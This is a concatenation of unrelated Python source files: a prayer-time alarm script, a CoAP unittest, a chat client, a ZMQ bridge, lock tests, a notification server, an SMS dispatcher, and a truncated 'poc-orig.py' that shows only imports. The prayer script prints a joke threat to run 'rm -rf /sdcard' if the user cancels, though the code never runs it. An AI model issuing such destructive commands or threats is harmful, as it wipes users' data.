        ts.write(inp)
    gettime()
# input
def start():
    """Main clock loop.

    Loads (and refreshes) today's cached schedule from .cookie/sc, prints it,
    then polls the wall clock once a second until the next prayer / imsak /
    sahur time is hit, at which point the matching alarm routine runs and
    start() recurses to re-display the schedule.  Ctrl+C returns to menu().
    """
    global s,d,a,m,i,tt,o,im,saur
    try:
        banner()
        try:
            o = open('.cookie/sc','r').read()
        except IOError:
            # No cached schedule yet: fetch it first.
            gettime()
            o = open('.cookie/sc','r').read()
        o = o.split(',')
        # Cached schedule belongs to a previous day -> refresh the cache.
        # NOTE(review): `o` is not re-read after this gettime(), so the stale
        # day's values are still used until the next call to start().
        if o[0] != tm('%d'):
            gettime()
        # Prayer times as HHMM integers: imsak, subuh, dzuhur, ashar,
        # maghrib, isya; `tt` is the current time in the same format.
        im= int(o[1].replace(':',''))
        s = int(o[2].replace(':',''))
        d = int(o[3].replace(':',''))
        a = int(o[4].replace(':',''))
        m = int(o[5].replace(':',''))
        i = int(o[6].replace(':',''))
        tt = int(tm('%H%M'))
        # Sahur wake-up alarm: one hour before imsak (plain HHMM arithmetic).
        saur = im - 100
        # Work out which event we are currently waiting for (display only).
        if tt > s and tt < d:
            ss = 'sholat Dzuhur'
        elif tt > d and tt < a:
            ss = 'sholat Ashar'
        elif tt > a and tt < m:
            ss = 'sholat Maghrib'
        elif tt > m and tt < i:
            ss = 'sholat Isya'
        elif tt > i and im < s or tt < 2400 and im < s and tt < im:
            ss = 'Imsak'
        else:
            ss = 'sholat Subuh'
        banner()
        print(f'''
{lg}Jadwal waktu sholat {lw}{tm('%d %B, %Y')}
{lg}untuk kota{lw} {o[7]}{lg} dan sekitarnya.
{lg}Imsak : {lw}{o[1]}
{lg}Subuh : {lw}{o[2]}
{lg}Dzuhur : {lw}{o[3]}
{lg}Ashar : {lw}{o[4]}
{lg}Maghrib : {lw}{o[5]}
{lg}Isya : {lw}{o[6]}
{lg}Sedang menantikan waktu {ss}..
ctrl + c untuk berhenti''')
        # Poll once a second; on a match run the alarm and restart.
        while True:
            tt = int(tm('%H%M'))
            time = tm(f'{lw}%H{lg}:{lw}%M{lg}:{lw}%S{lg}')
            if tt == s:
                banner()
                print (lw+f' {lg}SAATNYA ADZAN SUBUH{lw}\n untuk wilayah\n kota {o[7]} dan sekitarnya')
                print (lg+'_'*63)
                trdsholat()
                start()
                break
            elif tt == d:
                banner()
                print (lw+f' {lg}SAATNYA ADZAN DZUHUR{lw}\n untuk wilayah\n kota {o[7]} dan sekitarnya')
                print (lg+'_'*63)
                trdsholat()
                start()
                break
            elif tt == a:
                banner()
                print (lw+f' {lg}SAATNYA ADZAN ASHAR{lw}\n untuk wilayah\n kota {o[7]} dan sekitarnya')
                print (lg+'_'*63)
                trdsholat()
                start()
                break
            elif tt == m:
                banner()
                print (lw+f' {lg}SAATNYA ADZAN MAGHRIB{lw}\n untuk wilayah\n kota {o[7]} dan sekitarnya')
                print (lg+'_'*63)
                trdsholat()
                start()
                break
            elif tt == i:
                banner()
                print (lw+f' {lg}SAATNYA ADZAN ISYA{lw}\n untuk wilayah\n kota {o[7]} dan sekitarnya')
                print (lg+'_'*63)
                trdsholat()
                start()
                break
            elif tt == im:
                banner()
                print (lw+f' {lg}WAKTU IMSAK{lw}\n untuk wilayah\n kota {o[7]} dan sekitarnya')
                print (lg+'_'*63)
                trdpuasa()
                start()
                break
            elif tt == saur:
                banner()
                print (lw+f' {lg}WAKTUNYA BANGUN SAHUR GAN !!!{lw}\n untuk wilayah\n kota {o[7]} dan sekitarnya\n\n{lg}Credit:{x} https://youtu.be/EXjt18hF6UY')
                print (lg+'_'*63)
                trdpuasa()
                start()
                break
            else:
                # In-place clock display, refreshed every second.
                print ('\rSekarang jam {} '.format(time),end=''),;sys.stdout.flush();sleep(1)
    except KeyboardInterrupt:
        menu()
def ani():
    """Type out one random line from the global `txt` with a typewriter
    effect (50 ms per character), then pause two seconds."""
    print('\n')
    line = random.choice(txt)
    for ch in line:
        print(lg + str(ch.replace('\n', '')), end='')
        sys.stdout.flush()
        sleep(0.05)
    sleep(2)
def suara():
    """Play the audio matching the current moment via mpv:

    .fajr  -- subuh adzan (current HH:MM equals o[2])
    .ims   -- imsak tone  (current HH:MM equals o[1])
    .saur  -- sahur alarm (current HHMM equals `saur`)
    .reg   -- regular adzan for everything else
    """
    if tm('%H:%M') == o[2]:
        sound = '.fajr'
    elif tm('%H:%M') == o[1]:
        sound = '.ims'
    elif int(tm('%H%M')) == saur:
        sound = '.saur'
    else:
        sound = '.reg'
    # mpv output is discarded; only playback matters.
    sp.call(['mpv '+sound], shell=True, stdout=sp.DEVNULL, stderr=sp.STDOUT)
def trdsholat():
    """Show the prayer warning, play the adzan in a background thread and
    animate random quote lines (ani()) until playback finishes."""
    global txt
    # Quote lines consumed by ani() while the adzan plays.
    with open('.__','r') as f:
        txt = f.readlines()
    st = [lr,
        'JANGAN DI CANCELL KALO ADZANNYA BUNYI, LANGSUNG SHOLAT AJA',
        'KALO DI CANCELL AUTO RM -RF /SDCARD.',
        'MOHON MAAF BUAT YANG INI, BIAR PADA SHOLAT,',
        'KARENA SHOLAT ITU WAJIB.'
    ]
    for i in st:
        print(i.center(60))
    ttt = Thread(name='adzan',target=suara)
    ttt.start()
    # BUG FIX: Thread.isAlive() was removed in Python 3.9; is_alive() is
    # the supported spelling.
    while ttt.is_alive():
        ani()
def trdpuasa():
    """Play the imsak/sahur audio in a background thread while animating
    quote lines; .___ holds the sahur quotes, .____ the imsak ones."""
    global txt
    if int(tm('%H%M')) == saur:
        with open('.___','r') as f:
            txt = f.readlines()
    else:
        with open('.____','r') as f:
            txt = f.readlines()
    ttx = Thread(name='puasa',target=suara)
    ttx.start()
    # BUG FIX: Thread.isAlive() was removed in Python 3.9; is_alive() is
    # the supported spelling.
    while ttx.is_alive():
        ani()
def banner():
    """Clear the terminal and print the coloured SHOLAT ASCII-art banner."""
    sp.call('clear')
    print(f'''
{lgr}:::::::{lg}╗{lgr}::{lg}╗ {lgr}::{lg}╗ {lgr}::::::{lg}╗ {lgr}::{lg}╗ {lgr}:::::{lg}╗ {lgr}::::::::{lg}╗
{lgr}::{lg}╔════╝{lgr}::{lg}║ {lgr}::{lg}║{lgr}::{lg}╔═══{lgr}::{lg}╗{lgr}::{lg}║ {lgr}::{lg}╔══{lgr}::{lg}╗╚══{lgr}::{lg}╔══╝
{lgr}:::::::{lg}╗{lgr}:::::::{lg}║{lgr}::{lg}║ {lgr}::{lg}║{lgr}::{lg}║ {lgr}:::::::{lg}║ {lgr}::{lg}║
╚════{lgr}::{lg}║{lgr}::{lg}╔══{lgr}::{lg}║{lgr}::{lg}║ {lgr}::{lg}║{lgr}::{lg}║ {lgr}::{lg}╔══{lgr}::{lg}║ {lgr}::{lg}║
{lgr}:::::::{lg}║{lgr}::{lg}║ {lgr}::{lg}║╚{lgr}::::::{lg}╔╝{lgr}:::::::{lg}╗{lgr}::{lg}║ {lgr}::{lg}║ {lgr}::{lg}║
╚══════╝╚═╝ ╚═╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝ ╚═╝
{lw}Programmer Muslim Nggak Lupa Ibadah{lg}
{lg}[{x}Spesial Ramadhan 1440 H{lg}]
_______________________________________________________________
''')
def menu():
    """Show the main menu and dispatch to the chosen action."""
    banner()
    print(f'''
{lg}1.{lw} Aktifkan
{lg}2.{lw} Ganti kota
{lg}3.{lw} Update
{lg}4.{lw} Tentang
{lg}0.{lw} Keluar''')
    p = input(lg+'\nSholat # '+x)
    if p == '1':
        start()
    elif p == '2':
        # BUG FIX: the original called sp.call('rm .cookie/ts') without
        # shell=True, which looks for a program literally named
        # "rm .cookie/ts" and always failed silently.  Remove the cached
        # town id directly so gettown() starts fresh.
        try:
            os.remove('.cookie/ts')
        except OSError:
            pass
        gettown()
        start()
    elif p == '3':
        update()
    elif p == '4':
        tentang()
    else:
        exit()
def update():
    """Self-update: delete the install directory, re-clone the repo from
    GitHub and restart the script."""
    banner()
    print(lr+'Jangan di cancell ya ukhty.. biar nggak error :*')
    print(lg+'Cek jaringan..')
    try:
        get('https://github.com')
    except requests.exceptions.ConnectionError:
        print(lg+'Astaghfirullah .. Ukhty forgot to turn on the network')
        exit()
        # BUG FIX: exit() above only prints (it shadows the builtin), so the
        # original fell through, deleted the install dir and then failed to
        # clone while offline -- destroying the installation.
        return
    # BUG FIX: '\ n' was an invalid escape that printed literally.
    print(lg+'Updating .. \nLong time depends on the network, sabarr :)')
    os.system('cd .. && rm -rf sholat')
    sp.call(['cd .. && git clone https://github.com/karjok/sholat'],shell=True, stdout=sp.DEVNULL,stderr=sp.STDOUT)
    print(lg+'Selesai mengupdate')
    print(lg+'Memulai ulang..')
    sleep(2)
    os.system('cd ../sholat && python sholat.py')
def tentang():
    """Show the about page, wait for Enter, then return to the menu."""
    banner()
    print(f'''
{lg}Nama : {lw}Sholat
{lg}Versi : {lw}2.0 (update: 5 Mei 2019, 6:00PM)
{lg}Tanggal : {lw}31 Januari 2019, 2:18PM
{lg}Author : {lw}Karjok Pangesty
{lg}Tujuan : {lw}Mengingatkan kita pada
waktu sholat
{lg}Terimakasih : {lw}Allah SWT
Eka Pangesty, CRABS dan semua
umat Muslim seplanet bumi.
{lg}NB : {lw}Manusia nggak ada yang sempurna,
sama kaya tool ini.
Silahkan laporkan kritik atau saran
ke: - https://t.me/om_karjok
- https://facebook.com/karjok.pangesty.5
- @karjok.pangesty''')
    input(lg+'just entering ')
    menu()
def exit():
    """Print the goodbye message.

    NOTE: this shadows the builtin exit() and does NOT terminate the
    process; callers simply fall off the end of the script afterwards.
    """
    print(lg+'_'*63)
    # BUG FIX: '\ n' was an invalid escape that printed literally.
    print('Thanks ukhty,\nHope good health always 😙'+x)
if __name__=='__main__':
    # Ensure the cache directory exists, then enter the interactive menu.
    try:
        os.mkdir('.cookie')
    except OSError:
        # Directory already exists -- carry on.
        pass
    menu()
|
coverage_testIPv6.py | from Queue import Queue
import random
import threading
import unittest
from coapclient import HelperClient
from coapserver import CoAPServer
from coapthon import defines
from coapthon.messages.option import Option
from coapthon.messages.request import Request
from coapthon.messages.response import Response
__author__ = 'Giacomo Tanganelli'
__version__ = "2.0"
class Tests(unittest.TestCase):
    """CoAP server integration tests over the IPv6 loopback address "::1".

    NOTE: this is Python 2 code (print statements, `Queue` module).  Each
    test starts a real CoAPServer in a background thread and drives it with
    a HelperClient.
    """
    def setUp(self):
        # Fresh server per test plus randomised message-id counters.
        self.server_address = ("::1", 5683)
        self.current_mid = random.randint(1, 1000)
        self.server_mid = random.randint(1000, 2000)
        self.server = CoAPServer("::1", 5683)
        self.server_thread = threading.Thread(target=self.server.listen, args=(10,))
        self.server_thread.start()
        self.queue = Queue()
    def tearDown(self):
        self.server.close()
        self.server_thread.join(timeout=25)
        self.server = None
    def _test_with_client(self, message_list):  # pragma: no cover
        """Send each (request, expected-response) pair synchronously and
        compare every field that is populated on the expected response."""
        client = HelperClient(self.server_address)
        for message, expected in message_list:
            if message is not None:
                received_message = client.send_request(message)
            if expected is not None:
                if expected.type is not None:
                    self.assertEqual(received_message.type, expected.type)
                if expected.mid is not None:
                    self.assertEqual(received_message.mid, expected.mid)
                self.assertEqual(received_message.code, expected.code)
                if expected.source is not None:
                    self.assertEqual(received_message.source, self.server_address)
                if expected.token is not None:
                    self.assertEqual(received_message.token, expected.token)
                if expected.payload is not None:
                    self.assertEqual(received_message.payload, expected.payload)
                if expected.options:
                    self.assertEqual(len(received_message.options), len(expected.options))
                    for o in expected.options:
                        assert isinstance(o, Option)
                        # Option attributes are exposed with '-' mapped to '_'.
                        option_value = getattr(expected, o.name.lower().replace("-", "_"))
                        option_value_rec = getattr(received_message, o.name.lower().replace("-", "_"))
                        self.assertEqual(option_value, option_value_rec)
        client.stop()
    def _test_with_client_observe(self, message_list):  # pragma: no cover
        """Like _test_with_client, but requests are sent with a callback and
        responses are collected asynchronously through self.queue."""
        client = HelperClient(self.server_address)
        for message, expected in message_list:
            if message is not None:
                client.send_request(message, self.client_callback)
            if expected is not None:
                received_message = self.queue.get()
                if expected.type is not None:
                    self.assertEqual(received_message.type, expected.type)
                if expected.mid is not None:
                    self.assertEqual(received_message.mid, expected.mid)
                self.assertEqual(received_message.code, expected.code)
                if expected.source is not None:
                    self.assertEqual(received_message.source, self.server_address)
                if expected.token is not None:
                    self.assertEqual(received_message.token, expected.token)
                if expected.payload is not None:
                    self.assertEqual(received_message.payload, expected.payload)
                if expected.options:
                    self.assertEqual(len(received_message.options), len(expected.options))
                    for o in expected.options:
                        assert isinstance(o, Option)
                        option_value = getattr(expected, o.name.lower().replace("-", "_"))
                        option_value_rec = getattr(received_message, o.name.lower().replace("-", "_"))
                        self.assertEqual(option_value, option_value_rec)
        client.stop()
    def client_callback(self, response):
        # Hands asynchronously received responses to the observe test above.
        print "Callback"
        self.queue.put(response)
    def test_not_allowed(self):
        """GET/POST/PUT/DELETE on an unhandled path must all yield an ACK
        with code 4.05 METHOD_NOT_ALLOWED."""
        print "TEST_NOT_ALLOWED"
        path = "/void"
        req = Request()
        req.code = defines.Codes.GET.number
        req.uri_path = path
        req.type = defines.Types["CON"]
        req._mid = self.current_mid
        req.destination = self.server_address
        expected = Response()
        expected.type = defines.Types["ACK"]
        expected._mid = self.current_mid
        expected.code = defines.Codes.METHOD_NOT_ALLOWED.number
        expected.token = None
        exchange1 = (req, expected)
        self.current_mid += 1
        req = Request()
        req.code = defines.Codes.POST.number
        req.uri_path = path
        req.type = defines.Types["CON"]
        req._mid = self.current_mid
        req.destination = self.server_address
        expected = Response()
        expected.type = defines.Types["ACK"]
        expected._mid = self.current_mid
        expected.code = defines.Codes.METHOD_NOT_ALLOWED.number
        expected.token = None
        exchange2 = (req, expected)
        self.current_mid += 1
        req = Request()
        req.code = defines.Codes.PUT.number
        req.uri_path = path
        req.type = defines.Types["CON"]
        req._mid = self.current_mid
        req.destination = self.server_address
        expected = Response()
        expected.type = defines.Types["ACK"]
        expected._mid = self.current_mid
        expected.code = defines.Codes.METHOD_NOT_ALLOWED.number
        expected.token = None
        exchange3 = (req, expected)
        self.current_mid += 1
        req = Request()
        req.code = defines.Codes.DELETE.number
        req.uri_path = path
        req.type = defines.Types["CON"]
        req._mid = self.current_mid
        req.destination = self.server_address
        expected = Response()
        expected.type = defines.Types["ACK"]
        expected._mid = self.current_mid
        expected.code = defines.Codes.METHOD_NOT_ALLOWED.number
        expected.token = None
        exchange4 = (req, expected)
        self.current_mid += 1
        self._test_with_client([exchange1, exchange2, exchange3, exchange4])
if __name__ == '__main__':
    # Run the test suite directly (python coverage_testIPv6.py).
    unittest.main()
|
client.py | import socket
import threading
# Ask for a display name; the special name 'admin' must also supply a
# password that the server verifies during the handshake.
nickname = input("Choose Your Nickname:")
if nickname == 'admin':
    password = input("Enter Password for Admin:")
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#Connect to the chat server on localhost.
client.connect(('127.0.0.1',5555))
# Shared flag telling both worker threads to stop.
stop_thread = False
def recieve():
    """Background loop: answer the server handshake and print chat messages.

    Stops when `stop_thread` is set or the connection errors out.
    """
    while True:
        global stop_thread
        if stop_thread:
            break
        try:
            message = client.recv(1024).decode('ascii')
            if message == 'NICK':
                # Handshake: send our nickname, then handle a possible
                # password challenge or ban notice.
                client.send(nickname.encode('ascii'))
                next_message = client.recv(1024).decode('ascii')
                if next_message == 'PASS':
                    # NOTE(review): `password` is only defined when the user
                    # logged in as 'admin'; a PASS challenge for any other
                    # nickname would raise NameError here -- confirm the
                    # server only challenges 'admin'.
                    client.send(password.encode('ascii'))
                    if client.recv(1024).decode('ascii') == 'REFUSE':
                        print("Connection is Refused !! Wrong Password")
                        stop_thread = True
                # Clients those are banned can't reconnect
                elif next_message == 'BAN':
                    print('Connection Refused due to Ban')
                    client.close()
                    stop_thread = True
            else:
                # Regular chat traffic: just display it.
                print(message)
        except:
            print('Error Occured while Connecting')
            client.close()
            break
def write():
    """Read lines from stdin and send them to the server.

    Messages starting with '/' are admin commands (/kick, /ban); only the
    'admin' nickname may issue them.
    """
    while True:
        if stop_thread:
            break
        #Getting Messages
        message = f'{nickname}: {input("")}'
        # Strip the "nickname: " prefix (len(nickname)+2) to inspect the text.
        if message[len(nickname)+2:].startswith('/'):
            if nickname == 'admin':
                if message[len(nickname)+2:].startswith('/kick'):
                    # 2 for : and whitespace and 6 for /KICK_
                    client.send(f'KICK {message[len(nickname)+2+6:]}'.encode('ascii'))
                elif message[len(nickname)+2:].startswith('/ban'):
                    # 2 for : and whitespace and 5 for /BAN
                    client.send(f'BAN {message[len(nickname)+2+5:]}'.encode('ascii'))
            else:
                print("Commands can be executed by Admins only !!")
        else:
            client.send(message.encode('ascii'))
# Spin up the receiver and sender loops concurrently.
recieve_thread = threading.Thread(target=recieve)
recieve_thread.start()
write_thread = threading.Thread(target=write)
write_thread.start()
network.py | import zmq
import threading
import numpy as np
__author__ = "Ussama Zahid"
__email__ = "ussamazahid96@gmail.com"
# this file contains the defination for the ZMQ socket connection used to connect to the unity simulator
class ZMQPlug:
    """REP-socket bridge that streams the drone state to the Unity simulator.

    Protocol: the simulator sends a request (first its name, afterwards one
    ack per frame) and we reply with the current state as raw float64 bytes.
    """
    def __init__(self, state_ptr, queue, port=4567):
        print("[Network Plug] Attaching Network Plug")
        self.data_queue = queue
        self.state_ptr = state_ptr  # shared state array, snapshotted per frame
        self.context = zmq.Context()
        self.socket = self.context.socket(zmq.REP)
        self.socket.bind("tcp://*:"+str(port))
        self.running = True
        message = None
        print("[Network Plug] Waiting to connect...")
        # Block until the simulator introduces itself.
        while message is None and self.running:
            message = self.socket.recv()
        if message:
            print("[Network Plug] Connected to {}.".format(message.decode("utf-8")))
            self.socket.send(b"ack_reply")
        # start the thread to send the current state of the drone to simulator
        self.start_thread()

    def send_state(self):
        """Reply to every simulator ack with a float64 snapshot of the state."""
        while self.running:
            ack = self.socket.recv()
            if ack:
                data = np.copy(self.state_ptr)
                # BUG FIX: ndarray.tostring() was removed in NumPy 2.0;
                # tobytes() is the long-standing equivalent.
                out = data.astype(np.float64).tobytes()
                self.socket.send(out)

    def start_thread(self):
        self.thread_object = threading.Thread(target=self.send_state)
        self.thread_object.start()

    def close(self):
        """Stop the sender thread and tear down the ZMQ context (no-op when
        already closed)."""
        if self.running:
            print("[Network Plug] Closing Connection....")
            self.running = False
            # NOTE(review): if send_state is blocked inside recv(), join()
            # can hang until the simulator sends one more request -- confirm
            # whether the context should be destroyed before joining.
            self.thread_object.join()
            self.context.destroy()
test_lock.py | import os
import subprocess
import sys
import threading
import traceback
from modelkit.assets.remote import RemoteAssetsStore
from tests import TEST_DIR
def _start_wait_process(lock_path, duration_s):
    """Launch resources/lock.py against `lock_path` in a background thread.

    Returns a join() callable that waits for completion and yields the
    subprocess stdout (None if it failed).
    """
    script = os.path.join(TEST_DIR, "assets", "resources", "lock.py")
    output = None

    def _worker():
        nonlocal output
        try:
            proc = subprocess.Popen(
                [sys.executable, script, lock_path, str(duration_s)],
                stdout=subprocess.PIPE,
                stderr=subprocess.STDOUT,
            )
            raw, _ = proc.communicate()
            text = raw.decode("utf-8")
            if proc.returncode:
                print("ERROR", proc.returncode, text, flush=True)
                raise Exception("lock.py failed")
            output = text
        except Exception:
            traceback.print_exc()

    thread = threading.Thread(target=_worker)
    thread.daemon = True
    thread.start()

    def _join():
        thread.join()
        return output

    return _join
def test_lock_file(working_dir):
    """Run several lock.py processes against one lock file and verify that
    their hold intervals never overlap."""
    lock_path = os.path.join(working_dir, "lock")
    joiners = [_start_wait_process(lock_path, 2) for _ in range(3)]

    # Each process prints two timestamps: when it acquired the lock and
    # when it released it.
    intervals = []
    for join in joiners:
        out = join()
        assert out is not None
        lines = out.splitlines()
        assert len(lines) == 2
        intervals.append((float(lines[0]), float(lines[1])))

    intervals.sort()
    # Exclusive holds: each release happens no later than the next acquire.
    for (_, released), (acquired, _) in zip(intervals, intervals[1:]):
        assert released <= acquired
def test_lock_assetsmanager(capsys, working_dir):
    """Push one asset, then download it from two concurrent processes and
    check that exactly one hit the remote and the other hit the cache."""
    assets_dir = os.path.join(working_dir, "assets_dir")
    os.makedirs(assets_dir)
    driver_path = os.path.join(working_dir, "local_driver")
    os.makedirs(os.path.join(driver_path, "bucket"))
    # push an asset
    mng = RemoteAssetsStore(
        driver={
            "storage_provider": "local",
            "bucket": driver_path,
        },
        storage_prefix="prefix",
    )
    data_path = os.path.join(TEST_DIR, "assets", "testdata", "some_data_folder")
    mng.new(data_path, "category-test/some-data.ext")
    # start processes that will attempt to download it concurrently
    script_path = os.path.join(TEST_DIR, "assets", "resources", "download_asset.py")
    cmd = [
        sys.executable,
        script_path,
        assets_dir,
        driver_path,
        "category-test/some-data.ext:0.0",
    ]
    def run():
        # Each process prints __ok_from_cache__ or __ok_not_from_cache__.
        p = subprocess.Popen(
            cmd,
            stdout=subprocess.PIPE,
            stderr=subprocess.STDOUT,
        )
        stdout, _ = p.communicate()
        stdout = stdout.decode("utf-8")
        print(stdout)
    threads = []
    for _ in range(2):
        t = threading.Thread(target=run)
        threads.append(t)
        t.start()
    for t in threads:
        t.join()
    captured = capsys.readouterr()
    # One process must have downloaded, the other must have hit the cache.
    assert "__ok_from_cache__" in captured.out
    assert "__ok_not_from_cache__" in captured.out
|
notification.py | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the Apache 2.0 License.
import os
import threading
import http.server
import queue
import json
from contextlib import contextmanager
from loguru import logger as LOG
class PostQueueRequestHandler(http.server.BaseHTTPRequestHandler):
    """Request handler that pushes every POSTed body onto the server's queue.

    Bodies rejected by the server's optional `checker` callable go to the
    error queue instead.
    """
    def __init__(self, request, client_address, server):
        # Grab references to the owning server's queues and checker before
        # the base-class __init__ starts processing the request.
        self.queue = server.queue
        self.error_queue = server.error_queue
        self.checker = server.checker
        super(PostQueueRequestHandler, self).__init__(request, client_address, server)
    def do_POST(self):
        """Accept the notification, then validate and enqueue its body."""
        # NOTE(review): 201 is sent before the body is read and validated,
        # so clients always see success even for malformed notifications.
        self.send_response(201)
        self.end_headers()
        content_length = int(self.headers["Content-Length"])
        body = self.rfile.read(content_length)
        if callable(self.checker) and not self.checker(body):
            LOG.error(f"Notification is not in expected format: {body}")
            self.error_queue.put(body)
        else:
            self.queue.put(body)
    def log_message(self, format, *args):
        # Silence the default per-request stderr logging.
        pass
class ThreadingPostQueueServer(http.server.ThreadingHTTPServer):
    """ThreadingHTTPServer that collects POSTed bodies into queues.

    Well-formed notifications end up in `queue`; notifications rejected by
    the optional `checker` callable end up in `error_queue`.
    """

    def __init__(self, server_address, RequestHandlerClass, checker=None):
        assert (
            RequestHandlerClass is PostQueueRequestHandler
        ), "Should be initialised with PostQueueRequestHandler"
        self.queue = queue.Queue()
        self.error_queue = queue.Queue()
        self.checker = checker
        super().__init__(server_address, PostQueueRequestHandler)

    def get_queue(self):
        """Queue of accepted notification bodies."""
        return self.queue

    def check_errors(self):
        """True while no malformed notification has been received."""
        return self.error_queue.empty()
@contextmanager
def notification_server(server_info, checker=None):
    """Context manager yielding a running ThreadingPostQueueServer.

    `server_info` must be a "host:port" string.  On exit the server is shut
    down and the test fails if any malformed notification was received.
    Raises ValueError when the host:port configuration is missing/invalid.
    """
    host = None
    port = []
    if server_info is not None:
        host, *port = server_info.split(":")
        if not host or not (port and port[0]):
            raise ValueError("Notification server host:port configuration is invalid")
    else:
        raise ValueError("Notification server host:port configuration is invalid")
    with ThreadingPostQueueServer(
        (host, int(port[0])), PostQueueRequestHandler, checker
    ) as server:
        # Serve in a daemon thread so the caller's body runs concurrently.
        server_thread = threading.Thread(target=server.serve_forever)
        server_thread.daemon = True
        server_thread.start()
        LOG.success("Notification server started")
        try:
            yield server
        finally:
            # Fail loudly if any notification failed the checker.
            assert (
                server.check_errors() is True
            ), "Notification server caught malformed notifications"
            server.shutdown()
            server.server_close()
|
smsdispatcher.py | from threading import Thread
from queue import Queue, Empty
from redis import Redis
import json, re, time
from datetime import datetime
from sms import SMS, BALANCE_USSD, NetworkStatus
LOGGER="SMSDispatcher"          # shared logger name
TEN_MEGABYTES=10485760          # rotating-log file size limit (bytes)
FIVE_MINUTES=300.               # seconds between modem status checks
PORT="/dev/ttyAMA0"             # serial port of the SIM800 modem
BAUD=9600                       # serial baud rate
def taskWorker():
    """Worker thread: drive the SIM800 modem and drain the global taskQueue.

    Publishes modem state to Redis keys sim800NetworkStatus, sim800Balance
    and sim800RSSI.  Tasks are dicts with 'phoneNumber' and 'message' keys.
    NOTE(review): relies on `logging`, `taskQueue` and the sms module being
    set up by the __main__ block before this thread starts.
    """
    _redis=Redis()
    _redis.set("sim800NetworkStatus", "Unknown")
    _redis.set("sim800Balance","0")
    _redis.set("sim800RSSI",0)
    logger=logging.getLogger(LOGGER)
    # Matches balances like £4.50 in the USSD reply.
    balanceRegExp=re.compile(r"£(\d){1,2}\.(\d){2}")
    try:
        sms=SMS(PORT,BAUD,logger=logger)
        sms.setup()
        if not sms.turnOn():
            logger.critical("Failed to turn on SMS!")
            return
        if not sms.setEchoOff():
            logger.critical("Failed to set SMS echo off!")
            return
        sms.setTime(datetime.now())
        # Wait until the modem is registered on the network.
        netStat="Unknown"
        while netStat!="Good":
            netStat=sms.getNetworkStatus()
            if netStat is not None:
                if netStat in (NetworkStatus.RegisteredHome, NetworkStatus.RegisteredRoaming):
                    netStat="Good"
                elif netStat in (NetworkStatus.Searching,): netStat="Searching"
                else: netStat="Bad"
            else: netStat="Unknown"
            _redis.set("sim800NetworkStatus", netStat)
        # Check the balance right away and again after each successful send.
        checkBalance=True
        statusCheckTime=0.
        while True:
            if taskQueue.empty():
                if checkBalance:
                    checkBalance=False
                    balanceMsg=sms.sendUSSD(BALANCE_USSD)
                    logger.info("Balance message: {}".format(balanceMsg))
                    match=balanceRegExp.search(balanceMsg)
                    if match is not None:
                        balance=match.group(0)
                        logger.info("Balance amount: {}".format(balance))
                        _redis.set("sim800Balance",balance)
                # Periodic signal-strength and registration refresh.
                if (time.time()-statusCheckTime)>FIVE_MINUTES:
                    rssi=sms.getRSSI()
                    if rssi is not None: rssi=(rssi.value/4.)*100
                    else: rssi=0
                    _redis.set("sim800RSSI",rssi)
                    netStat=sms.getNetworkStatus()
                    if netStat is not None:
                        if netStat in (NetworkStatus.RegisteredHome, NetworkStatus.RegisteredRoaming):
                            netStat="Good"
                        elif netStat in (NetworkStatus.Searching,): netStat="Searching"
                        else: netStat="Bad"
                    else: netStat="Unknown"
                    _redis.set("sim800NetworkStatus", netStat)
                    statusCheckTime=time.time()
            # Block for up to a minute waiting for work, then loop to refresh.
            try: task=taskQueue.get(timeout=60)
            except Empty: continue
            if task is None: continue
            phoneNumber=task.get('phoneNumber')
            message=task.get('message')
            if phoneNumber and message:
                logger.info("Sending SMS: {}, {}".format(phoneNumber, message))
                if sms.sendSMS(phoneNumber, message):
                    logger.info("SMS sent successfully")
                    checkBalance=True
                else: logger.error("Failed to send SMS! {}, {}".format(phoneNumber, message))
            else: logger.error("Task is not valid: {}".format(task))
            taskQueue.task_done()
    except Exception as e:
        logger.critical("Exception in task thread: {}".format(e))
        return
def main():
    """Listen on the Redis ``sms`` pub/sub channel and enqueue send tasks.

    Each JSON-decoded message is put on the module-level ``taskQueue`` for
    the SMS worker thread to process. Runs forever (``pubsub.listen`` blocks).
    """
    logger = logging.getLogger(LOGGER)
    _redis = Redis()
    pubsub = _redis.pubsub()
    pubsub.subscribe(['sms'])
    for msg in pubsub.listen():
        # redis-py delivers channel names as bytes, hence the b'sms' compare.
        if msg['channel'] != b'sms':
            logger.debug("Got message unknown channel {}".format(msg['channel']))
            continue
        if msg['type'] == 'subscribe':
            logger.info("Subscribed to channel")
            continue
        if msg['type'] != 'message':
            logger.debug("Got unknown message type {}".format(msg['type']))
            continue
        try:
            data = msg['data'].decode('utf-8')
            data = json.loads(data)
        except Exception as e:
            # BUG FIX: previously logged through the root logger
            # (logging.error) instead of the configured module logger, so
            # decode failures bypassed the handlers set up in __main__.
            logger.error("Failed to decode data: {}, {}".format(msg['data'], e))
            continue
        taskQueue.put(data)
if __name__ == "__main__":
    import sys, logging
    from argparse import ArgumentParser

    def exceptionHook(etype, evalue, etraceback):
        """Log uncaught exceptions through the configured logger, then flush."""
        from traceback import format_tb
        logger = logging.getLogger(LOGGER)
        logstr = "{name}; {value}; {traceback}".format(
            name=etype.__name__,
            value=str(evalue) or "(None)",
            # BUG FIX: format_tb was called with the undefined name
            # 'traceback' (NameError inside the hook); the parameter
            # holding the traceback object is 'etraceback'.
            traceback="\n".join(format_tb(etraceback))
        )
        logger.critical(logstr)
        for h in logger.handlers:
            try:
                h.flush()
            except Exception:  # best-effort flush; the hook must never raise
                continue

    parser = ArgumentParser(description="SMS Dispatcher.")
    parser.add_argument("-d", "--debug", dest="debug", default=False,
                        action="store_true", help="turn on debug information")
    parser.add_argument("-s", "--stdout", dest="stdout", default=False,
                        action="store_true", help="re-direct logging output to stdout")
    options = parser.parse_args()
    loglevel = logging.DEBUG if options.debug else logging.WARNING
    logger = logging.getLogger(LOGGER)
    if options.stdout:
        handler = logging.StreamHandler(sys.stdout)
    else:
        from logging.handlers import RotatingFileHandler
        handler = RotatingFileHandler("./smsdispatcher.log", maxBytes=TEN_MEGABYTES, backupCount=5)
    handler.setFormatter(logging.Formatter("%(asctime)s : %(levelname)s -> %(message)s"))
    logger.addHandler(handler)
    logger.setLevel(loglevel)
    sys.excepthook = exceptionHook
    # Worker thread consumes tasks queued by main()'s pub/sub loop.
    taskQueue = Queue()
    taskThread = Thread(target=taskWorker)
    taskThread.start()
    main()
poc-orig.py | #!/usr/bin/env python3
import argparse
from colorama import Fore, init
import subprocess
import threading
from pathlib import Path
import os
